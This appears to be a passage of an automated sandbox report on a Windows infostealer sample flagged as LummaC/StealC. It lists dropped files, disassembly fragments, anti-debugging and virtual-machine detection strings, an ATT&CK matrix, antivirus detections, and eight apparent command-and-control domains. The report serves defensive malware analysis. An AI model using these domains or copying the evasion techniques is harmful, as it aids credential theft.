Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_024DDDDE push dword ptr [esp+ecx-75h]; iretd	0_2_024DDDE2
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_024D9DE8 pushad ; retf	0_2_024D9DEF
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0043D810 push eax; mov dword ptr [esp], 707F7E0Dh	4_2_0043D812
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00443469 push ebp; iretd	4_2_0044346C
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0044366E push 9F00CD97h; ret	4_2_004436B1
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0043AE30 push eax; mov dword ptr [esp], 1D1E1F10h	4_2_0043AE3E
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_004477A5 push ebp; iretd	4_2_004477AA
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0092B097 push eax; mov dword ptr [esp], 1D1E1F10h	4_2_0092B0A5
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0092DA77 push eax; mov dword ptr [esp], 707F7E0Dh	4_2_0092DA79
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00913A79 push esp; iretd	4_2_00913A7C
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0099F1B5 push ss; retf	4_2_0099F1A3
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0099F132 push ss; retf	4_2_0099F1A3
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0099CD88 push ebp; ret	4_2_0099CD8B
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0099ADE4 push 00000039h; ret	4_2_0099AEBB
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0099AE4D push 00000039h; ret	4_2_0099AEBB
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0099AE73 push 00000039h; ret	4_2_0099AEBB

Source: sqJIHyPqhr.exe	Static PE information: section name: .text entropy: 7.542034715807606
Source: ScreenUpdateSync[1].exe.0.dr	Static PE information: section name: .text entropy: 7.372861140072552
Source: E093.tmp.exe.0.dr	Static PE information: section name: .text entropy: 7.372861140072552

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	File created: C:\Users\user\AppData\Local\Temp\E093.tmp.exe			Jump to dropped file
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZRZDXR93\ScreenUpdateSync[1].exe			Jump to dropped file

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe

Code function: 0_2_0040E974 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0040E974

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe

Window / User API: threadDelayed 9642

Jump to behavior

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-65569

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe

API coverage: 5.1 %

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe TID: 6592	Thread sleep count: 344 > 30	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe TID: 6592	Thread sleep time: -248368s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe TID: 6592	Thread sleep count: 9642 > 30	Jump to behavior
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe TID: 6592	Thread sleep time: -6961524s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe TID: 6812	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe TID: 5964	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_004389F2 FindFirstFileExW,		0_2_004389F2
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_024D8C59 FindFirstFileExW,		0_2_024D8C59

Source: Amcache.hve.8.dr	Binary or memory string: VMware
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.8.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.8.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.8.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.8.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.8.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: sqJIHyPqhr.exe, 00000000.00000002.4891698333.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp, sqJIHyPqhr.exe, 00000000.00000002.4891698333.0000000000A16000.00000004.00000020.00020000.00000000.sdmp, E093.tmp.exe, 00000004.00000003.2580522241.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, E093.tmp.exe, 00000004.00000002.2679041344.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, E093.tmp.exe, 00000004.00000002.2679106229.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, E093.tmp.exe, 00000004.00000003.2580784849.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, E093.tmp.exe, 00000004.00000003.2580939365.0000000000A05000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.8.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: sqJIHyPqhr.exe, 00000000.00000003.4761468852.0000000003311000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\7
Source: Amcache.hve.8.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.8.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.8.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.8.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.8.dr	Binary or memory string: VMware-42 27 6e d0 59 6b 97 52-b4 9a 7f 42 1f 0e 66 9c
Source: Amcache.hve.8.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.8.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.8.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.8.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.8.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.8.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.8.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.8.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.8.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: E093.tmp.exe, 00000004.00000002.2679106229.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, E093.tmp.exe, 00000004.00000003.2580784849.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, E093.tmp.exe, 00000004.00000003.2580939365.0000000000A05000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWC
Source: Amcache.hve.8.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe

Code function: 4_2_0043C1F0 LdrInitializeThunk,

4_2_0043C1F0

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe

Code function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0042A3D3

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe

Code function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0041EC5E

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_0042FE5F mov eax, dword ptr fs:[00000030h]	0_2_0042FE5F
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_009D9D33 push dword ptr fs:[00000030h]	0_2_009D9D33
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_024D00C6 mov eax, dword ptr fs:[00000030h]	0_2_024D00C6
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_024A092B mov eax, dword ptr fs:[00000030h]	0_2_024A092B
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_024A0D90 mov eax, dword ptr fs:[00000030h]	0_2_024A0D90
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_008F092B mov eax, dword ptr fs:[00000030h]	4_2_008F092B
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_008F0D90 mov eax, dword ptr fs:[00000030h]	4_2_008F0D90
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0099998B push dword ptr fs:[00000030h]	4_2_0099998B

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe

Code function: 0_2_0043BBC1 GetProcessHeap,

0_2_0043BBC1

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0042A3D3
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_004104D3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004104D3
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_00410666 SetUnhandledExceptionFilter,	0_2_00410666
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_0040F911 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0040F911
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_024CA63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_024CA63A
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_024B073A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_024B073A
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_024AFB78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_024AFB78
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_024B08CD SetUnhandledExceptionFilter,	0_2_024B08CD

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: E093.tmp.exe	String found in binary or memory: rapeflowwj.lat
Source: E093.tmp.exe	String found in binary or memory: crosshuaht.lat
Source: E093.tmp.exe	String found in binary or memory: sustainskelet.lat
Source: E093.tmp.exe	String found in binary or memory: aspecteirs.lat
Source: E093.tmp.exe	String found in binary or memory: energyaffai.lat
Source: E093.tmp.exe	String found in binary or memory: necklacebudi.lat
Source: E093.tmp.exe	String found in binary or memory: discokeyus.lat
Source: E093.tmp.exe	String found in binary or memory: grannyejh.lat

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe

Process created: C:\Users\user\AppData\Local\Temp\E093.tmp.exe "C:\Users\user\AppData\Local\Temp\E093.tmp.exe"

Jump to behavior

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe

Code function: 0_2_0041077B cpuid

0_2_0041077B

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_0043B00A
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: GetLocaleInfoW,	0_2_004351C0
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: EnumSystemLocalesW,	0_2_0043B2CD
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: EnumSystemLocalesW,	0_2_0043B282
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: EnumSystemLocalesW,	0_2_0043B368
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_0043B3F5
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: GetLocaleInfoW,	0_2_0043B645
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0043B76E
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: GetLocaleInfoW,	0_2_0043B875
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0043B942
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: EnumSystemLocalesW,	0_2_00434DCD
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_024DB271
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: EnumSystemLocalesW,	0_2_024D5034
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: GetLocaleInfoW,	0_2_024D5427
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: EnumSystemLocalesW,	0_2_024DB4E9
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: EnumSystemLocalesW,	0_2_024DB534
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: EnumSystemLocalesW,	0_2_024DB5CF
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: GetLocaleInfoW,	0_2_024DBADC
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_024DBBA9
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: GetLocaleInfoW,	0_2_024DB8AC
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: GetLocaleInfoW,	0_2_024DB8A3
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_024DB9D5

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe

Code function: 0_2_004103CD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_004103CD

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe

Code function: 0_2_004163EA GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,

0_2_004163EA

Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.8.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_004218CC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,	0_2_004218CC
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_00420BF6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	0_2_00420BF6
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_024C1B33 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,	0_2_024C1B33
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_024C0E5D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	0_2_024C0E5D

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Native API	1 DLL Side-Loading	11 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Query Registry	Remote Desktop Protocol	3 Clipboard Data	12 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	131 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Deobfuscate/Decode Files or Information	NTDS	1 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	124 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	4 Obfuscated Files or Information	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	22 Software Packing	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	2 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	24 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
sqJIHyPqhr.exe	74%	ReversingLabs	Win32.Trojan.StealC
sqJIHyPqhr.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZRZDXR93\ScreenUpdateSync[1].exe	100%	Avira	HEUR/AGEN.1312567
C:\Users\user\AppData\Local\Temp\E093.tmp.exe	100%	Avira	HEUR/AGEN.1312567
